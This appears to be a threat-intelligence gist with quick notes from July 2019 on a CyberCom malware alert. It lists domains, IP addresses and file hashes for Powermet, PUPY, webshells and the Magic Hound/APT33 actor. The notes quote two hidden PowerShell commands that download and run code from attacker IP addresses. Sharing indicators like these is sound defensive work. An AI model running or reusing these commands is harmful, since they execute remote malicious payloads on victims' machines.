Skip to content

Instantly share code, notes, and snippets.

@Blevene Blevene/QuickNotes
Created Jul 2, 2019

Embed
What would you like to do?
Cyber July 2nd 2019 Quick Notes
CyberCom
https://twitter.com/CNMF_VirusAlert/status/1146130046127681536
https://twitter.com/CNMF_VirusAlert/status/1146130046127681536
https://customermgmt.net/page/macrocosm - 37.220.6.115 (AS 20860 (Iomart Cloud Services Limited))
b09bce085a2bbc1c0498baf3f75b48f8c86db132ebfc64d72b300f47b7435e89 - Powermet , 2017-01-14 03:35Z
> Source Doc: 528714aaaa4a083e72599c32c18aa146db503eee80da236b20aea11aa43bdf62
> Powershell: http://69.87.223.26:8080/eiloShaegae1
> "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://69.87.223.26:8080/eiloShaegae1')"
>Payload: PUPY, 924b4615ba6e6ed87fad81ad4c2ae876d10a9b34fb347210a2ec7621b92005cb
> OSINT: https://www.netscout.com/blog/asert/additional-insights-shamoon2
f2bf20e7bb482d27da8f19aa0f8bd4927746a65300929b99166867074a38a4b4 - ASPX Webshell
28ebfe86217ed36ead5b429cadcd005338a0ae6207119729b53698b5e4a3ef3f - Powermet, 2017-01-06 16:50Z
> http://139.59.46.154:3485/eiloShaegae1
> "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://139.59.46.154:3485/eiloShaegae1')"
> Intermediate stage Downloader: http://139.49.46.154:3485/IMo8oosieVai
> Downloader for PuPy
> OSINT: https://securityintelligence.com/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks/
0515cd2ba84a5da10c63cadae06f04d778d66c054b9184edb57be6ea95a1095b - JSP Code Injector
dc546dc992b31b3927e63cefbfd2716ca016ca238f6142cf16e27b240b0d7bb9 - File Uploader
@Blevene

This comment has been minimized.

Copy link
Owner Author

commented Jul 2, 2019

Activity falls under "magichound" https://unit42.paloaltonetworks.com/unit42-magic-hound-campaign-attacks-saudi-targets/

There is some contention as to whether this actor fits into APT33 or not.

@Blevene

This comment has been minimized.

Copy link
Owner Author

commented Jul 2, 2019

Interesting tweets from friends:
https://twitter.com/obiwanblee/status/1146152208976584704

Associated sample is fdae4a166decf212ef9429a4fb95c60e
which is consistent with the use of the tool RULER. Related binary (2c0ade3a01d6318861d54ce94faca006) is an AutoIT executable likely used to download additional tools from hxxps://customermgmt[.]net/page/news #apt33

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.